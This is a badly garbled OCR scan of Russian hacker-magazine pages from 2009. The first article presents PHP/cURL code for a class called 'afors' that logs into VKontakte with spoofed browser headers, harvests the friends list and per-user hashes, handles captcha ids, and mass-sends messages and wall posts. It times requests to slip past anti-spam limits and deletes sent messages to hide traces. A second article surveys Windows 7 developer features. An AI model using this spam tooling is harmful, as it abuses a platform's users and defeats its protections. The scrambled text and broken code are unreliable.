АёПАtv1@ЕА
D~_ J-~ ~ ~ CS) l§§I
",','
, , " -
+++ />::/ I
1-++
ф
,:;, ID~~~ ~CS)~
[[][]
+++
СВЯЗЬ КЛИЕНТА
+++
•
ПОЧТОВЫЙ
СЕРВЕР
1+++
"
1+++
ТВОРЧЕСКИИ СПАМ
+++
ВКОНТАКТИКА
Сага о том, как программерырассылаютсвоим друзьям
'+++
поздравительныесообщения
Есличеcrно, мы совсем не одобряем во всех ее проявлениях.Так что, вперед ких десятков сообщений в сутки пользова
+++ сам факт существования спама: нас он - окунемся в мир противостояния спама телям, не являющимися твоими друзьями
раздражает совершеннотак же, как и и антиспама, капчи и человеческого (и то, если пользователь не запрещал
любого другого интернетчика, и нам так фактора, гения и злодейства, Моцарта и общую отсыл ку ему таких сообщениЙI.
же хочется поймать всех спамеров В один Сальери ... 2) Время между отправлением сообще
,+++ большой котел, залить серной кислотой и ний контролируется - система просто 1·le
медленно кипятить на среднем огне. Так, КАПЧА _ даст отправить сообщение, не выдержав
стоп, я увлекся. Почему же мы решились И ЧЕЛОВЕЧЕСКИИ ФАКТОР определенный лимит между вызовами
на создание статьи со столь претенциоз «ВКонтакте» очень неплохо защищен от скриптов отправки [трех секунд достаточ
+++ НЫМ названием? А как иначе? Специали спама. Защита эта, по сути, стандартна Hol. Сам понимаешь, реализация много
стов по информационнойбезопасности для социальных сетей: поточности с авторизацией по одному
темная сторона силы должн,а интересовать 1) Невозможно отправить более несколь аккаунтустановится неуместна.
~~Ъf~~~':::':~-'-""'"
§~f.s.\~, .._.
....._'...._."........-..-,.... -_._-,..-...,,- -
...... КОДФ'УНКЦИИ
~:g~~~~~::~- .".
АВТОРiИ 3АIЦИ И LOGIN_COOK[)
1
§~;~~~Е~~~~~q:~:;:.§"@:~~~~~~;т;Ё;:"-::F.:--=~::.::,; _,_.
E;:,~~i~;;r.::
как таковых нет. Это значит, что спамеры, preg_match_all ( '#sid" : " ( . *7) "# " $answer, $sid..id) ;
глупость, и я не уверен по поводу пер preg_match ( '#remixmid= (. *7) ;#', $auttl_cook, $myid);
l8]~
» l2:::SJ
coding
l8]
+++
, __ iserw._IP!!t:oS!:t_~:!oJ
.,.
--
a"tl.. : n"'1"".I~""".: rl!'..1:oft.... u..-..-.\LIкI~Н.ru;
... fl\.i"ра~ ... ·~f-lI:)сс.сс_~~,) .. ,)"'6~'Ь~9.,~': r .... j"S'ill·b21;ofQF6""~OIl"lI)Jlo\)C70C' BICotrtakTII!.py-",~iIМ>Носсрr;q.СТ80~аз,нако-,
QfltL... t-~ ..... 'th: 32-\
опlN.t-l'р";оррlio:-lot:иn/"·_·'о,.
........ гlсnсQ(!еd
мы)lO'*,чТoбdlJl'n'>o".ОА~,а.vco<~сооеАНН~nп~шrА"ОСТllИl11tЬtll':ot1"t'/JI(П:.
~.J'f(Io<olo ~QW\O""fI)
~~ ~;~~~~ ';::1 ~j(h;Os8I·.\"~~2C1a 1C'02"'cl",In",R..bb'1'29t"P~!t"· 'oa'oDtos....d· Нo''f.*.~ :r37ЗО65'J,
I Sf'r~ .. r
D~r .. ~'ln. 19 н.у
~1
n!)J_",,/ •. f>
20119 21:~.~3 С'"~
BJCffT&kl'e-С~ПOCOJl.~сeWтDРОCl;l<loolIfУIф"'''"С,
I ~
Coron
~~"оUl:г.. о-"'J· PIiP/5., IHI· .. tcb13
.)/»t4lТl>боJlloШООAl(lДIQ,,,огарооеI!.s:CJI:%I)'II:dIOТ.Н~tc:IIIЫ:It~.
• 8cw"А"'о<Ты.'I'bC'I1t1l(aorI'М;;ТО~ТOIIII,IC'ТО&.AO;JOГ,
SH~C ..ukjf; ""N.kOk-~: '~rir~~·S'<!II. QI\I-~!J-:.!:CI't eS:17:23 СИ1; p~t1\'I:
dOl>.>lo·.uk.... likt~.!'U
--
IЗ~3~ Эtca."p&«I по СФП1' _ •• ~
'(n.. ""'rtpt> 01Ul.'fТoВllcuC'l'nOXnepen1<"ТlI6J,I'IН
~~~~~~ ~,~~~r:on~.gf'tt~u~~~~!~li~lUIIe('b~Jt' a'j;
/lМ'ОНТllOCТгClW06-ZJ:I09
ДРУГУ
ВИД СТРАНИЦЫ АВТОРИЗАЦИИ В СОЦИАЛЬНОЙ
СЕТИ
-'+++ у друзей - много ЛИЧНЫХ праЗДНИКОIJ. Поздравлять их вручную
сущая пытка, позтому я предлагаю тебе написать скрипт, который
будет делать зто за нас.
Ниже я покажу. как написать подобный скрипт с использованием
Curl и РНР. Назвал я его банально: «API [ог Spam", а 8 дальней
КОД ФУНК'ЦИИ
шем - просто «afors».
ШАГ1.
АВТОРИЗАЦИЯ
ПОЛУЧЕН,ИЯ
вателя по cookies, нам необходимо их заполучить. Как известно,
СПИIСКАДРУЗЕЙ
ленный скрипт, сервер возвращаетВсе cookies, необходимые
для беспроблемногоиспользования ресурса. Поскольку нам
АВТ'ОРИЗИ,РОВАННОГО
необходимо продублироватьPOST -запрос от браузера к скрипту
public $fr_siz; i / определяен паблик- переменную успешно, и cookies передались без проблем, Теперь давай в
public $fr_rnass; / / определяем паблик- переменную точности повторим этот механизм авторизации на сервере
-'+++ 1/ Подробнее (нотрите висходниках ние - наш запрос должен быть максимально похож на запрос.
/ I задаем целевой скрип'!' сформированный браузером. Ниже >1 буду поочередно описывать
cur1_setopt($ch, CURLOPT_URL,
основные функции из своего класса автоматической рас
/! определяем Ти.r1 6раузера для маскироьки СформированныеPOST -данные отправляются на СКрVtпт h1lJU'L
.-+ ++ 1;' установим требование воэвращений оггвета сервера vkОПlаktеЛJ/lоgiп.рhр. Представленная выше функция lоgiп_сооk(]
!;' заносии cookies принимает входящими пара метрами логин, пароль, id-номер
,1 / заносим пришеДllIИЙ ответ в переЫ.еНhУЮ $al1S 1tJer [последние часто ~Iеобяэательны, позтому могут содержать нулевые
.-+++ 1/ закрываем сессию ClJP.L значенияl. Результатом станет возвра щение состояния авториза
ции и занесеНVtе cookies в переменную класса $this.-7auth_cook. В
случае успешной авторизации функция возвращает id пользовате,
1/ паРСИi'·1 СllИСОК друзей и заНОСИJ."\1 их id ля и полученные cookles в переменную класса public $auth_cook.
.,+++ /I 8 tvU:1ССИВ Stl1is->IГ_InаSS t а ИХ КQпит.:естео в Если же авторизация не прошла - то возвращает ответ «failed» .
1/ переменн-ую
$this->fr_siz А если авторизация безуспешна В течеНVtе пяти попыток - воз
preg_rnatch_a11 ( '#<option va1ue\=" ( [0-9] +) ">#UiS' , вращает код аутентификации [id] captcha. Например. такой: «sid_
$answer, $this->fL'_rnаss) ; сар'21361 0192404". Зная id, можно отловить само изображеНVtе кап
.+++ $this->fr_siz=count ($this->fL·_rnаss[1]); чи 110 ссылке hllp :I/vkontakle. ru/captcha.php?s= 1&sid=21361 О 192404
и ввести дополнительныии ее параметрами номер аутентификации
:~:~~A~::~~.~:~~~~i./".e (nnpi.tiDI~; "Ш 1.11: 'IIinDII"IS кт 1: ."-1 tLlt ,_, Q]1i .МЕ'
ttR Z_II.'S''''H
=~~.:::::'::-:..--t....-il·...,....._ I : ......:!.f"".-O)<""~""........~ , ..-"';...,~-Qo.~.:, .....,
R~ftr...,.: l,ttp:II.. 1cont..... tt.r"/IC>J:ift.pllJl? ..·,
.
""Ctpt: t..-.rt.Jhtnl. ;;oWl,iC;ot,;!.Dn/l<lt1,;q-•. 9 ..."pJi.... tl""'.htru.·"IO.l. 1~' /p~ • ..... .?.. /j'PtS'.
i ..... 9.. /S'~f. 1_9I.",II-",oitrwp. "'·;ч·8.'
.~."
1>
il;l:U'pt-Li.ngшg":Uk·UА.LIk;q-е.'J'.n;q-II_8
~"рt-с:,.,,~t,:i:l-\l·'1~9-1.utf-l.tltF-t6
1Icc..·pt-(fltadlng: il)~fII1tll
Ca:r>fI<:ttialt; 1::<:~-"\iУII'. 'Е
. • :ч·8_1
I'r,"",,''''~
Н: o~rH,tl'. 9zi". <"""11:..". i".nl:it,. t~.a.iI"rs
.».'&:IH
~c._,.,:t"'i~
~ ..-,." ....M
t.ol•• tll;Ofl..:~
~:
o-.:
"'I'1 :.t. 1~"" 1nl 1~;~::К !аС; ,.., ...,: _.i... _t.t.~ ....
Сопtl'flt-lr.а.1I1=l"-er--€"ОО(lin,;оi1li"',
CDnl<:"t-L .. п,lh:1~
SlI't-(:qDk;~' ~ .. i"::.i"~<t.. S~II!'O~17I"r.w..,.~1I1 . .77l1.f1.Ir~b\t111f1111o~OC1Io2n~~;.."f'i ..... ~~Frt. З.....,r-'D1n '~~З1~~ 1:1'1'1; p;,lh-/;; lI''"'"'''''_"k~nl,)oklfo_,,~
ШАГ2. ШАГз. _
ПОЛУЧЕНИЕСПИСКАДРУЗЕЙ ПРЕОДОЛЕНИЕ ТРУДНОСТЕИ
Теперь, когда мы заполучили cookies, авторизовав Чтобы отправить сообщение пользователю. ПРОС10
шись во «ВКонтакте», следующим большим делом знать его id в системе недостаточно. Продвинутые
будет получение списка специальных номеров - id программеры вконтактика ввели систему специ
всех друзей пользователя в системе, по которым альных хешей, прикрепленных к каждому id участ t> dvd
далее можно будет отправлять сообщения. ника сети. ОсобенноСТЬэтой системы - для разных На дискеты найдешь:
Для этого в классе существует фун кция fr_ авторизированных пользователей хеши пользователя Denwerc версией
rec($cookiel, которая входящими данными при по одному 'd разные, а чтоб отправить сообщение, РНР 5.х.х и установ
нимает cookies, полученные, например, функцией необходимо передать скрипту как id пользователй, так ленной библиотекой
login_cook[l. Она работает просто: парсит полученный и его хеши iих по двое ДЛА каждого idl. Они уникальны CurL; снифер сетевого
html-код от сервера, обратившись к скрипту по адре для каждого отправителй сообщения. Такой ход был трафика SmагtSпiff;
су [1 t t ~ :I/p d а. vko п ta k t е .ГLJ/I'Vri 1е: введен ДЛй затруднения сбора баз данных пользова класс "AforS" с при
телей всей системы. Поскольку рассылать сообще мерами скриптов
ответствен ности за
КЛАССА«AFOR5»
использование пред
+++
~
~ ~
1
i
метр secure; свои кукисы; тема сообщения; сам текст сообщения;
homep-id для captcha; разгаданный ключ для caplcha Iпоследние
<?
inc1,"de ("afors ,php'); (( !!одкnючаем кnасс
:+++ два могут содержать нулевые значения, если не нужныl. $m=new afors ( ) ; (/ создаем объект класса
Обращаясь к скрипту по адресу hltp:llvkontakte.ru/maiL.php, $mess= "I-1е110 Wor1d"; (.1 пишем текст сообщения 01
функция посылает ему сформированныйРО5Т-запрос из всех /.1 iТогинемся и получаем cooki es
необходимых и ранее добытых нами данных. $ш->lоgiп_сооk("10gin", "раss'лоrd" ,0,0);
11
.1 /
попучаем массив хеmей ЛИУ:НОГО соос.ЩОН/rЯ ДПЯ
. .
А зачем же нам разводитьлишний мусор и палево, если можно
$g=$m->user_ha"t! ($m->fr_шаss[1] [10] ,$cookies) ;
после отправки сообщения сразу же его опуда удалить? Для s1eep ( "5" ); .1 / делаеы задержку 13 5 секунд
входящим гrapaMeTpoM являются лишь cookies авторизирован $g[2], $cookies," Hello",$mess, "О", "О");
ного пользователя В системе. В случае успешного завершения sleep( "5"); // делаем задерю<:у в 5 секунд
рассмотрим преодоление трудностей в процессе отправки со echo $1:·е. " : : •. $re2 ;
-+++ парсим хеши стены для каждого друга, а затем - отправляем ЧТО такое? Всего 12 строчек весьма легкого, понятного и от
жит id интересующего пользователя. Тут входящими параметрами inc1ude (" afors .php"); (.1 подключае!" клзсс
являются Id пользователя [хеши стены которого надо добыты и $m=new a.l'ors () ; // создаем объект класс;;
собственные cookies, соответственно.Функция возвращаетмассив $шеss= "Hello Wor1d" ; // пишем текст сообщения
.+++ $chas, где $chas!1] содержит специальный код-хеш стены для .1.1 логинемся и получаем cookies
параметра walL_hash, а $chas[21- специальный код для параметра $m->lоgiл_сооk( ., 10gin", " password ", "О", "О");
mld Для отсылки сообщения на стену необходимо воспользовать .1 / Г1рисваиваеи переменной $c:ookies сfu'1И c.:ookies
.+++ captcha_sid, $captcha_key) , которая обращается к скрипту по // вызываем фУНКЦИР;' для ПОiТYчения СПИСка друзей ..
адресу .bJ..!.J:LLLvkonlakte.ru/wall.php, передавая в него данные $m->Er_rec($cookies);
'+++
методом РО5Т Входящими параметрами функции являются со
ответственно; параметр wall_hash; пара метр mid; собственные
cookles; само сообщение; специальный id-KOA теста captcha; и
ключ теста caplcha [последниедва пара метра, как и В предыду
щих случаях, могут иметь нулевые значения. если не нужны]. В
случае успешной отправки ВОЗ8ращаетсязначение 1,8 случае
.1.1
//
(/
получаем tйССИВ кешей настенного сообщеfDfЯ для
$wa11=$m->usеr_wа11_hаsh($m->fr_mаss[lJ
$cookies) ;
делаем задержку в
5 секунд
[10])
I ,
облома - О; если система затребовала тест captcha- функция $re=$m- >send_wall ($",аl1 [1] , $·"all [2], $cookies,
Ij-+++
возвращаетего id-номер аутентификации. $mess, "О", "О");
.+++ Свободно использовать описанные выше функции можно и без по· ?>
временной черной магии дорогого стоит. Для кодеров, желающих шеприведенные примеры довольно примитивны, они довольно
Ка
.+++ познатьДзен кодинга для социальных сетей [вплоть до написания ясно демонстрируют работу класса .
качественных ботов), на диске лежит бонус -
на РН Р, требующий подключенной библиотеки
класс. написанный
Curl с версией ЗАКЛЮЧЕНИЕ
ror
РНР, начиная с пятой. Ты можешь сам доработать и оптимизиро Надеюсь, что приведенная в этой статье информация будет Са
.+++
вать код или дополнить класс новыми функциями, если сочтешь использована исключительнов общественно-полезныхцелях.
необходимым. - это дело практики. Влюбом случае. будут вопро· «ВКонтакте», как и большинстводругих популярных социальных
и ~
сы - пиши мне на почту. В дальнейшем на своем сайте Я буду вы сетей, хорошо защитил своих пользователейи дал им возмож
кладывать обновления зтого класса и проводить обсуждения его ность в полной мере наслаждаться использованиемпредостав
.+++
дополнений и общего качества работы. Присоединяйся J ленных сервисов. Но если человек глуп и наивен, то на про· ИНФО
Теперьдавай рассмотрим ПРОСТой код скрипта, который отправ сторах интернета никакая программная защита не способна его
ляет сообще ние другу: уберечь. В общем, успехов и удач и В творческих порывах I I
€)::
:~.+++ ~106 ХАКЕР 06 {126/ 09
porPAMMA
EMbl
НОВОСТИ ИГРОВОГО МИРА
.j
'/' r Р/
~j! ~
I
'1;:
.'.
, I
--. ,,/~~
.
,
,
,
,
.r
'. .:;,:. Г! ,
...... 'r;: )
#,
"
::::' ;"" ~ ,'. ,- ~-_:_-,-':'------
. .,
~ .,I(
--
~Г.
W~'" ..:' .
~
."./
-
/(' / .. "
.,/
~.,
, /
,
~ tj-f1'
.....-
/
j
........ ,...-
I
,.-Г
,/:- ':""
~- .,,'''''''
F" r \
V
:-",.-:-:-:.:, ......-
I .
- /
•
ИНФОРМАЦИЮ О ПОДКЛЮЧЕНИИ ТРЕБУЙТЕ У ВАШЕГО РЕГИОНАЛЬНОГО ОПЕРАТОРА TAIOКE В &ОЛЕЕ 100 КАI5ЕЛЬНЫХСЕТЕЙ РФ
:;~,;;~
SENSOR ДРР
~
L ii,ig}~ДLlО:[jНI (А'.Ч :
,«<,.~ ,
LOCATION ДРР
,-,~
~
it
LISER
SENSOR API CONTROL Pдr-..JEL
CI:J
l_+++
-+++ ,,
,,
I АРХИТЕКТУРА
,!, WINDOWS SENSOR
,, '.../ PD 08JECTS
-+++ , IPortablo?Do?vico?Vauo?s PLATFORM
~------~------~- IPo.... tab1о? Do?y i со? Va uo?sCo11 o?ct io Гl::: -----~
i Г'_-:'.I IPortab,le-Dеviсе:::Ко?уСоЛо?сtiоns
-~++
ИГОРЬ АНТОНОВ.
.......
~~..:::-~
I A"T.O~Y ,'GOR.I(HV@GM~~L:,CO"'.!
г+++
Cr=:J
[_+++
WI,NDOWS7
-+++
ДЛЯ РАЗРАБОТЧИКА
O=J
Технологическиенововведения,прогнозируе'Мыев новой ОСи
-+++
Wi,nd,ows7 - пожалуй, первая операционная система от Мiсгоsоft,
'-+++ в которой программиста ждет столько интересныхтехнологий. Не
O:=:J смотря на то, что финальный релиз еще не готов, уже есть реальная
~
СЖЕЛЕЗОМ MultiTouch Iправильнеесказать' Windows мони~J.
L...J......-...
Ты, наверное, уже в курсе. что в новой Винде TouchJ реализована пра~тически В полном Для реализации всех фишек технологии
-+++ ~ардинальныt-1образоt-1 изt-1енился графиче объеt-1е. Если ты прешься от интерфейса Windows Touch, раэработчи~и приготовили
ский интерфейс. Ка~утверждаетМ5, он стал iРhопе. то приготовься, - то же самое можно большой набор АРI-функций, поэтоt-1у встро
еще проще, пушистее и обзавелся поддерж будет делать и в Wlf1dows 7 kat-1o собой, если ить в СВОЮ программу поддержку интерфейса
за глаза. А если 'гебе окажется их мало (само Стоитзаметить, что работа с устройством не Но пока в зтой бочке меда чувствуется не
собой, ведь наши планы не имеют границ).
то к твоим услугам - пакет низкоуровневых
Принтер. сканер. mр3-плеер. труба - устрой hllP-: l/pIogbIog.ru - тематика этого блога: .NET Рт amewoTk И все, что с ним свяэано.
ства, которые имеются у большинства юзе Материалы ресурса будут полезны всем категориям .NET-программистов.
ров Испольэоватьдевайсы по назначению
дело нехитрое, а вот разработка приложений httр:liwiпdоwsstеашЫоg.соm/Ыоgsl dеvеlорегs - англоязычная версил блога "Windows
для взаимодействия с зтими устройствами 7 for Developers».
напоминаетпесню группы Sepultura. Про
блема не нова. но в Windows 7 ее попытались htt;p://aspnetrnania.com- сайтоб ASP .NET. Новости IDIатформы, эксклюзивные статьн,
решить с помощью соэдания целой платфор обзорICНИГИТ.д.
мы Windows Devlce PlatJorm. Суть этого «ноу
хау» заключается в создании набора АРI для htф://wеЫоgs.аsр.пеt/sсоttgu -блог ScootyGu's, целиком посвящеиный ASP .NET. Из
83а имоде йствия С разл ичны М и устройствами. особенностей можно выделlГГЬ: регулярно пополняемый раздел Tips And Triclcs, новости
Не стоит обольщаться и думать, что после ИЗ мира ASP .NET, обзор кннг и т. д. Единственный минус - вся информация на англl1Й
перехода на Windows 7 ты сразу сможешь CI<омяэыке.
мобильника. Вовсе нет Чтобы воспользо h!Шilаsр.пеt/mvс-официальныЙ сайт об ASP .NET и использовании смежных техно
ваться всеми препеетями новинки, нужно логий (ЛJАХ, МVC и т. д.). Огромный IDIЮС сайта - подборка скринкастов про иснользо
подождать, пока производители устройств вание МVC, ЛJАХ и пр. Одним видеоконтеитом содержимое ресурса не ограничивается
реализуют ее поддержку. - текстового материала (гайдов, туторов, книг) также предостаточно. Язык ресурса
английский.
WINDOWS BIOMETRIC
FRAMEWORK 11 Щ>: Iltecl1days.ru - РУСCI<оязычны.й ресурс по новым технологиям и продуктам комна
В Windows 7 появилась служба для взаимо шш Microsoft. ОСIiОВНОЙ тиu контента - CI<pHHKacTbl. их количество растет в геометри
действия с биометрическими устройствами ческой прогрессии , поэтому uосещать ресурс рекомендуется почаще. Все пред ставлен
- Windows Biometrics FrameWork Теперь нет ныевидеоматериалы на русском языке.
политики безопасности. Так. для каждого Iщ:р: /ldownload.microsoft.com/documentslrus/windows!V7IT. pd f - еще одна книга, в
пользователя можно закрепить «определен кагоройрассматриваютсявопросысовместимостиприложенийс Windows 7. Однако это
ный палец». Успешное считывания отпечатка иэдание направлено не на разработчиков, а на IТ -специалистов.
будет предоставлять пользователю вход в
Windows или домен. ьttp://ыlgs.шiсгоsоft.со.il/blоgsl/аshа//гсhivе/20091/2/251wiпdОWS-Z-П'iggег-stагt
.....
-+++
I
O::J
» coding
1-+++
Provided ьу:
г+++
Microsoft
a::J
Windows Biometric Service Мkгою(t
-+++ IHVflSV
BJometrlc Servlce Provlder
tНVIISV
Engine
-+++ Adapter ОЕМ
C::r:::=J
[_+++
KMDF DriVe,
'"+++
АРХИТЕКТУРАWINDOWS BIOMETRIC SERVICE
O:::::J
It +++ большая ложечка дегтя, а и,менно - поддержка ограниченного круга
устройств На сегодняшний день осуществлена поддержка девайсов
++++
WINDOWSSENSOR AND LOCATION PLATFORM ГОВОРИТ
Windows Sепsогапd Location Platforгll - платформа, созданная для обе
O:::=:J
спечения взаимодействия ОС с различными датчиками устройств [опять И ПОКАЗЫВАЕТ
вспоминаем iРhопе). Основное ее назначение - дать возможность
1++++
разработчикам создавать "умные" приложения, способные приспоса M'ICROSOFT: АЛЕКСЕЙ ФЕДОРОВ,
PARTNERS LEAO ОРЕ
работает при солнечном свете, то разумнее всего сделать интерфейс в Windows 7 ноддерживается ряд технологий, обеспечивающих
приложения более контрастным и сувеличенными шрифтами [на совмесrnмость приложений, написанныхдля предыдущих
гля нцевом дисплее при солнечном свете контрастный шрифт будет версий ос. П-специалисты могут решить проблемы совмести
смотреться лучше), или наоборот, если вокругтемень, - применить к мости с помощью инфраструктуры обеспечения совмеcrимости
интерфейсу насыщенные цвета (Applic.a.tion Compatibility Infrastructure), позволяющей<<латать»
Location Platform - платформа, позволяющая работать с устройствами npиложенияс помощью<сarиаток» (shims) и уровней совме
определения географического местонахождения обьекта Типичный сrnмоcrи (layers). А разработчикам предоставляются средства
пример - GP5. тестирования при:ложений (Applicarion Verlfier, тестовые угили
Все возможности этих платформ доступны в виде огромного числа API ты для серrnфикации при:ложений), а таюке тестовые сценарии
функций IСн/управляемый код). 8 5DКпроизводителиустройств найдут ДIIЯ сертификации приложеnий - они могут использоваться
специфи кацию разработки драйверов устройств, а разработч и ки при для то го, чтобы гарантировать совместимость новых версий при
кладных решений - интересные при меры использования технологий. ложений в процессе их разрабо11СИ.
Для тех, у кого нет никакихдатчиков [я почему-тоуверен. чтоты тоже из их Инфрас:труктураАррliсаriоп Compatibilitylnfrastrllcture реали
ч ислаJ, в 50 К n рипасены соответствующие змуляторы. зованаввиде«перехватчиков»ключевыхфункцийWiпdоws
АР! и эмуляциииоведенияиредьщущи:хверсий операциопной
НОВЫЕ ИНТЕРФЕЙСНЫЕ ВОЗМОЖНОСТИ
системы Windows. В настоящее времл сущестuyет более 360
ГАДЖЕТЫ
«затurаток»-отпростых,искажающихномерверсии ОС (более
многю~ юзерам Windows Vista полюбилась за так называемые гад
50% всех песовместимостейнриложений!)до более комплекс
же ты - мини-приложения, располагающиеся на 5idеВаги показы
ных, решающихзадачидоступак файловойсистеме, рееструи
вающие различную, как полезную. так и бесполезную информацию.
т. п. Около 60 уровней совмесrnмостиЭМУ1IИруюТповедениекак
8 Windows 7 от боковой панели решили полностью отказаться, а
предыдущихверсий ОС, так и отдельныхнодсистем.Интересен
гаджеты разместить прямо на рабочем столе. Это прикольнее, чем и такой факт - на уровне Windows 7 RC реализованы «заплатки»
наличие лишней панели, отьедающей немало системных ресурсов и для более чем 6000 при:ложениЙ.По мере созданиярешенийдля
дра гоцен н ого простра нова. Са ма технологи Я разработки гаджетов приложенийсоответствующие«заплатки»распространяются
осталась прежней, за исключением двух маленьких нововведений в составенакетов обновленийОС и включаютсяв специальную
- теперь можно их устанавливать программно, и настраивать показ базуданныхсовместимостей,которая присутстnуетнакаждом
o.!L/H6oA:; с7(7.J/r';'I"~и',/:7Щ;f;,",-I:'пр"'f/800iё? КОМIIбютере.
Неlр
Foc acceS5 to additional resource5 and infomlation, 5uch as dO\"inload5, foгum P05ts, and the \!lindow5 SDK team
bJog, go to the Windows SDK Developer Center.
<. I >
~content;~raH.!p F.... .1
Re.d,
НЕLРДЛЯSDК
ПРОАПГРЕЙЖЕННЫЙTASKBAR
СИСТЕМНЫЕНОВИН,КИ
Самая заметная новинка Windows 7с позиций пользователя - обнов
РАЗРАБОТЧИКАМ
ленная па нель задач. Причем, не просто обновленная, а полностью
ДРАЙВЕРОВПОСВЯЩАЕТСЯ
переделанная: и в визуальном плане, и сточки зрения функциональ
Знакомый всем системным программистамнабор Windows OГlverKitTaK
ности. Реально, новый TaskBar- не просто симпатичная панелька с
же подвергся заметномуулучшению. В третью версию вошла обновлен
содержимымфайловой системы!) файлов и папок. Другим примером Технология PowerShell постепеннозавоевываетсердца админов, при
возможностей панели задач может быть IconOverLay 1«Перекрывания выкших расходоватьвремя с пользой.Действительно,зачем постоянно
иконок» J. позволиющий ИСпользовать несколько иконок для отобра
тратить время на выполнениеодной и той же операции,если ее можно
WINDOWS SCENIC RIBBON 1. PowerSheLL обзавелся графической средой разработки. Програм м и ро
Интерфейс Ribbon, впервые представленныйв MS Office 2007, вать сценарии стало еще n роще и понятнеЙ. Среда обладает всеми необ
многими был оценен по достоинству. Начиная с Windows 7, RiЬЬоп ходимыми средствами для комфортной разработки [отладчик, подсветка
перерос в Scenic RIЬЬОП и стал неотъемлемой частью операционной синта ксиса и т.д.], что делает процесс разработки схожим с создани ем
системы. Это означает, что теперь можно создавать приложения приложения в та ких средах как Visual StudlO
с современным интерфейсом как на управляемом коде, так и ис 2. Количество доступ н ых командлетов существенно возросло. до
пользуя привычныйWiп32 API. В общем, есть, где душе кодерской бавились кома ндлеты для получения информации и управления 115,
разгуляться. ActiveDirectoгy \1 т.д.
~айл Наi1ти Qтключить ВcjД ~ вектоpt1blе Е!1СУНКИ КЭЦ! СеР§.ис Пров~ка ееЖИ~1 обозревателя: !Е8 Режи!:! J1окументов: cтaHJlapTHbI11IE8
·:,._+++
3. Поддержка удаленной работы дарит возможность одновременно На момент написания статьи [середина мая) библиотека находится в
.+-+++ выполнять команды на удаленных компьютерах с одного. на котором стадии альфа-версии [ссылку на библиотеку можно найти во врезке). Фи
работает служба. нальный релиз должен появиться незадолго до релиза самой Windows 7.
образом, появляется возможность многократного использования кода. при мерами и т.д. Тем не менее. уже сейчас есть, на что посмотреть. Не
буду разбирать все nримеры . а лучше заострю твое дра гоценное внима
.+-+++ TRIGGER START SERVICE ние на тех, что демонстрируют новые технологии. В первую очередь, зто
Службы Windows издавна считалисьодним из самыхузкихмест в си возможности новых платформ. В SDK есть прекрасный при мер использо
стеме Для бол ьшинства системных сервисов по умолчанию установлен вания «умного» интерфейса. Всем известный MSDN Reader взаимодей
Q
режим автозапуска при загрузке ОС. Служб немало, и из-за их совместно ствует с датчиками освещения и при изменении их показателей' меняет
-+-+++ го старта требуется дополнительноевремя на загрузку ОС. Для решения оформление контента. При увеличении яркости света содержимое
проблемы всегда приходилось выставлять ненужным сервисам режим nриложения станов,\Тся более контрастным (увеличиваютсяшрифты,
запуска «вручную». В Windows 7 рутинные действия не требуются коде добавляется жирность, интервал между строх становится больше), а при
рам стала доступна возможность создавать Тгiggег-сервисы Их запуск уменьшении - возвращается в исходное положение. Поскольку наличие
,+-+ ++
зависит отопределенныхсобытиЙ. Например. если ты кодишь сервис для сенсорных датчиков пока считается диковинкой, то для тестирования
взаимодействия с мобильным телефоном. то нет смысла держать сервис примеров придется воспользоваться драйвером-змулятором устройства
в работающем состоянии. пока устройство не будет подключено (поставляется вместе с SDKJ.
Помимо демонстрации Windows Sensor Platlorm, в SDK представлены
1+-+++
в ПОМОЩЬ РАЗРАБОТЧИКУ примеры nрограммированияSuper Ваг lисnользова н ия JumpList и т AJ.
WINDOWSAPI СООЕРАСК создания интерфейса Sсепiс RiЬЬоп, новых возможностей фильтрации
FOR MICROSOFT .NET FRAMEWORK трафика YI т.д. Если ты всерьез собираешься заняться разработкой под
Vista- девелоперы хорошо знаком ы с библиотекой Vista Впdgе, в которой WIndows 7, то обязательно скачай SDK и разбери его примеры в реальных
раализованы все необходимые интерфейсы для доступа ко всем новым условиях (скажем, на Windows 7 RCI.
техн ологиям системы К моменту финал ьного релиэа WI пdоws 7 выйдет
L::::]
аналогичная библиотека с новым именем - W·lпdоws АРI CodePack for INTERNETEXPLORER8
Windows N ЕТ Framework. Эту библ и отеку будут составлять несколько Наверня ка, ты уже знаешь, что в соста в Windows 7 войдет новая версия
либ, обеспечивающихпростой доступ ктаким функциям системы, как. браузера Iпtегпеt Explorer8. Изменения в нем затронули как сам дви
Библиотеки. WlпdоwsSепsогРlаtfогm.TaskBar. TaksDialogs. Windows жок. так и функционал.Начиная с зтой версии. в браузере появились
LocatlOn Platform инструментыдля разработчиков[DeveloperToolsl, - предназначены
rrFfJ)
-~
То use AppVerifier select an application to test (Ctrl+A), dick the checkboxes next to the tests, and ex~cute the code. Select Viе'Л' to see
properties and I09s. То stop testing an application dick Сtrl-Ю. For mOI'e detaned information see the Help.
Applications T~sts
I 1mage.I\-lа-m-е---------------------.
~"~Basics
uTorrent.exe $"~ Compatibility
[О LO'I~ Resource Simulation
[ О LuaPri\/
I$J.. О l>1iscellaneous
I±J.. О Printing
Properties
Name I Туре Value Description
Propagate Вoolean FALSE--- Propagate verifier settings from parent process to child process. Note tl1at .
AutoCIr Boolean FALSE After specified image s13rts to run. the verified image 'NiII dear the settings .
AutoDisabIeStop Boolean ТRUE Verifier lЛ'ill only соmрlаiл оп се foг the sam~ issue fouпd.
Logging,I'JjthLOck.. , Вооlеап ТRUE 1'he dlllоаdfuпlоаd e\'ent 'л'iII Ье logged. Verifier is doing 1/0 'Nhеп the load ...
:?ave E~t
они для отладки представления страниц И сценариев, написанных на в Windows 7 тебя буд'{l' встречать те же проблемы, что и при переносе в
языке JScript. Используя Developer TooLs, ты можешь изменять значения Windows Vista. Если планируешь перескочить Windows Vista и перенести
любых тегов htmlAoKyMeHTa "на лету» и просматривать результат изме свое приложение сразу наWiпdоws 7, то крайне рекомендую сначала
нений. При подгонке дизайна или отладке JScгipt эти возможности буд'{l' обкатать свое творение на Vista.
весьма кстати. СчиТай, Ч1'0 юзаешь FireBug, только в 'Е J Вместо реального тестирования приложения BWindows 7ты можешь
воспользоваться специальной утилитой АррLiсаtlQП Verifier !смотри
ВОПРОСЫ СОВМЕСТИМОСТИ ГJttр:llblоgs.msdп.СОП"lI,позволяющейвыполнитьтест на сов,~естимость
Самый страшный деньдля любого разработчика - тот, когда хорошо без непосредственнойустановки Windows 7 Также очень рекомендую
отлаженное приложение приходится переносить под новую версию ОС. ознако,~иться с электронными книгами: «Обеспечениесовместимости
На этом шаге всплываютвсе нестандартные решения и «хаки", которые приложений. Для разработчика» и "Обеспечение совместимости прило·
